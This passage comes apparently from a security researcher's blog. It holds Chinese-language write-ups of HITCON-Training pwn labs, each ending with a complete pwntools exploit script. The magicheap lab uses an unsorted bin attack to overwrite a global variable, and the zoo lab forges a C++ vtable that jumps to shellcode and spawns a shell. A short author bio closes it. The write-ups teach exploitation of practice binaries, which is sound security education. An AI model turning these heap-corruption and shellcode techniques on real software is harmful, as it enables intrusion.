class="n">payload</span><span class="p">)</span> <span class="n">show</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">libcBase</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\x7f</span><span class="s2">&#34;</span><span class="p">)[</span><span class="o">-</span><span class="mi">6</span><span class="p">:</span> <span class="p">]</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s2">&#34;</span><span class="se">\x00</span><span class="s2">&#34;</span><span class="p">))</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s2">&#34;free&#34;</span><span class="p">]</span> <span class="n">success</span><span class="p">(</span><span class="s2">&#34;libcBase -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libcBase</span><span class="p">))</span> <span class="c1"># pause()</span> <span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">libcBase</span> <span class="o">+</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s2">&#34;system&#34;</span><span class="p">]))</span> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><h3 id="lab14-magicheap">lab14-magicheap</h3> <p>在 edit_heap() 里有 arbitrary overflow, 我们最终要达到的目的是修改全局变量 magic &gt; 4869, 可以考虑使用 unsorted bin attack 这一技巧 unsorted bin attack 的结果是向任一地址写一个不可控的大数(unsorted bin list 的地址), 看起来比较局限, 但在某些情境下还是很有用的:</p> <ul> <li>修改 global_max_fast 为一个较大的数, 这样根据 malloc 的源码</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="cm">/* </span><span class="cm"> If the size qualifies as a fastbin, first check corresponding bin. </span><span class="cm"> This code is safe to execute even if av is not yet initialized, so we </span><span class="cm"> can try it without checking, which saves some time on this fast path. </span><span class="cm">*/</span> <span class="k">if</span> <span class="p">((</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span> <span class="p">(</span><span class="n">nb</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span> <span class="p">(</span><span class="n">get_max_fast</span> <span class="p">()))</span> <span class="p">{</span> <span class="n">idx</span> <span class="o">=</span> <span class="n">fastbin_index</span> <span class="p">(</span><span class="n">nb</span><span class="p">);</span> <span class="n">mfastbinptr</span> <span class="o">*</span><span class="n">fb</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">fastbin</span> <span class="p">(</span><span class="n">av</span><span class="p">,</span> <span class="n">idx</span><span class="p">);</span> <span class="n">mchunkptr</span> <span class="n">pp</span> <span class="o">=</span> <span class="o">*</span><span class="n">fb</span><span class="p">;</span> <span class="p">.....</span> </code></pre></td></tr></table> </div> </div><p>更大的 chunk 也可以被视为 fastbin, fastbin attack 的利用范围就大了很多</p> <ul> <li>往某一地址上写值, 比如可以在 __free_hook 前的某一地址上写入一个大数(0x7f**********)来满足 fastbin attack 的条件(提供 fastbin 的 size)</li> </ul> <p>unsorted bin attack 的原理也很简单, unsorted bin 的自己实现了 unlink 的功能, 没有使用宏定义</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="n">bck</span> <span class="o">=</span> <span class="n">victim</span><span class="o">-&gt;</span><span class="n">bk</span><span class="p">;</span> <span class="p">......</span> <span class="cm">/* remove from unsorted list */</span> <span class="n">unsorted_chunks</span> <span class="p">(</span><span class="n">av</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">bk</span> <span class="o">=</span> <span class="n">bck</span><span class="p">;</span> <span class="n">bck</span><span class="o">-&gt;</span><span class="n">fd</span> <span class="o">=</span> <span class="n">unsorted_chunks</span> <span class="p">(</span><span class="n">av</span><span class="p">);</span> </code></pre></td></tr></table> </div> </div><p>可以看出, 如果我们能控制 unsorted bin 的bk 为地址 target - 16, 那么在 bck -&gt; fd = unsorted_chunks(av) 这一步时, target 就会被写入 unsorted bin 的地址. 但同时也要注意此时 unsorted bin list 已经被破坏, 下次再有 unsorted bin 的操作就会引起 crash</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">time</span> <span class="kn">import</span> <span class="n">sleep</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./magicheap&#34;</span><span class="p">)</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./magicheap&#34;</span><span class="p">)</span> <span class="c1"># libc = ELF(&#34;&#34;)</span> <span class="k">def</span> <span class="nf">DEBUG</span><span class="p">():</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span> <span class="k">def</span> <span class="nf">create</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">content</span><span class="p">,</span> <span class="n">attack</span> <span class="o">=</span> <span class="bp">False</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice :&#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; : &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span> <span class="k">def</span> <span class="nf">edit</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice :&#34;</span><span class="p">,</span> <span class="s2">&#34;2&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; : &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; : &#34;</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span> <span class="k">def</span> <span class="nf">delete</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice :&#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">create</span><span class="p">(</span><span class="mh">0x10</span><span class="p">,</span> <span class="s1">&#39;aaaa&#39;</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="mh">0x80</span><span class="p">,</span> <span class="s1">&#39;bbbb&#39;</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="mh">0x10</span><span class="p">,</span> <span class="s1">&#39;cccc&#39;</span><span class="p">)</span> <span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">cyclic</span><span class="p">(</span><span class="mh">0x10</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x91</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s2">&#34;magic&#34;</span><span class="p">]</span> <span class="o">-</span> <span class="mh">0x10</span><span class="p">)</span> <span class="n">edit</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0x10</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="mh">0x80</span><span class="p">,</span> <span class="s1">&#39;dddd&#39;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice :&#34;</span><span class="p">,</span> <span class="s2">&#34;4869&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><h3 id="lab15-zoo">lab15-zoo</h3> <p>C++ 的 pwn 题, 这道题目没有开 NX, 也就是说可以使用 shellcode, 在 Dog::Dog, Cat::Cat 这些函数里也有很明显的通过 strcpy 实现 overflow 的漏洞, 因此这一题就可以通过溢出伪造虚表, 控制虚表指针指向 shellcode 地址来 get shell 更多 C++ pwn 的内容可以看这个 <a href="https://github.com/M4xW4n9/slides/blob/master/pwn_others/pwnincplusplus-160217120850.pdf">slide</a>, 内容虽然有点老了, 但很经典</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s2">&#34;./zoo&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span> <span class="k">def</span> <span class="nf">addDog</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">weight</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">weight</span><span class="p">))</span> <span class="k">def</span> <span class="nf">remove</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;5&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="k">def</span> <span class="nf">listen</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./zoo&#34;</span><span class="p">)</span> <span class="n">nameofzoo</span> <span class="o">=</span> <span class="mh">0x605420</span> <span class="n">sc</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="o">.</span><span class="n">sh</span><span class="p">())</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;:&#34;</span><span class="p">,</span> <span class="n">sc</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">nameofzoo</span><span class="p">))</span> <span class="n">addDog</span><span class="p">(</span><span class="s1">&#39;0&#39;</span> <span class="o">*</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="n">addDog</span><span class="p">(</span><span class="s1">&#39;1&#39;</span> <span class="o">*</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="n">remove</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">vptr</span> <span class="o">=</span> <span class="n">nameofzoo</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">sc</span><span class="p">)</span> <span class="n">addDog</span><span class="p">(</span><span class="s1">&#39;a&#39;</span> <span class="o">*</span> <span class="mi">72</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">vptr</span><span class="p">),</span> <span class="mi">2</span><span class="p">)</span> <span class="n">listen</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div> https://bash-c.github.io/aboutme/ Mon, 01 Jan 0001 00:00:00 +0000 https://bash-c.github.io/aboutme/ <h2 id="about-me">About me</h2> <ul> <li>Senior security researcher at <a href="https://www.chaitin.cn">Chaitin Tech.</a>, good at nothing</li> <li>Bachelor from <a href="http://www.bit.edu.cn">Beijing Institue of Technology</a> (2015~2019)</li> <li>The only thing I dislike is being interrupted when in <code>deep</code> thinking, especially in coding</li> </ul> <h2 id="intership-experience">Intership experience</h2> <ul> <li>2017.10 - 2018.8: <ul> <li>I was working in <a href="https://netsec.ccert.edu.cn">NISL@THU</a>, focused on fuzzing.</li> </ul> </li> <li>2018.11 - 2019.4: <ul> <li><a href="https://www.chaitin.cn/zh/">Chaitin Tech</a>, Intern Security Researcher</li> </ul> </li> </ul> <h2 id="my-works">My works</h2> <ul> <li>Github link: <a href="https://github.com/bash-c">bash-c</a></li> <li><a href="https://gist.github.com/bash-c/eaf1aaa0e21fde5b6a9d0671317cebfa">bug list</a></li> <li><a href="https://www.tianfucup.com/">Tianfu Cup</a> 2021 Docker-CE winner</li> <li>Speaker of <a href="https://hitcon.org/2020/slides/Exploit%20(Almost)%20All%20Xiaomi%20Routers%20Using%20Logical%20Bugs.pdf">HITCON 2020</a></li> </ul>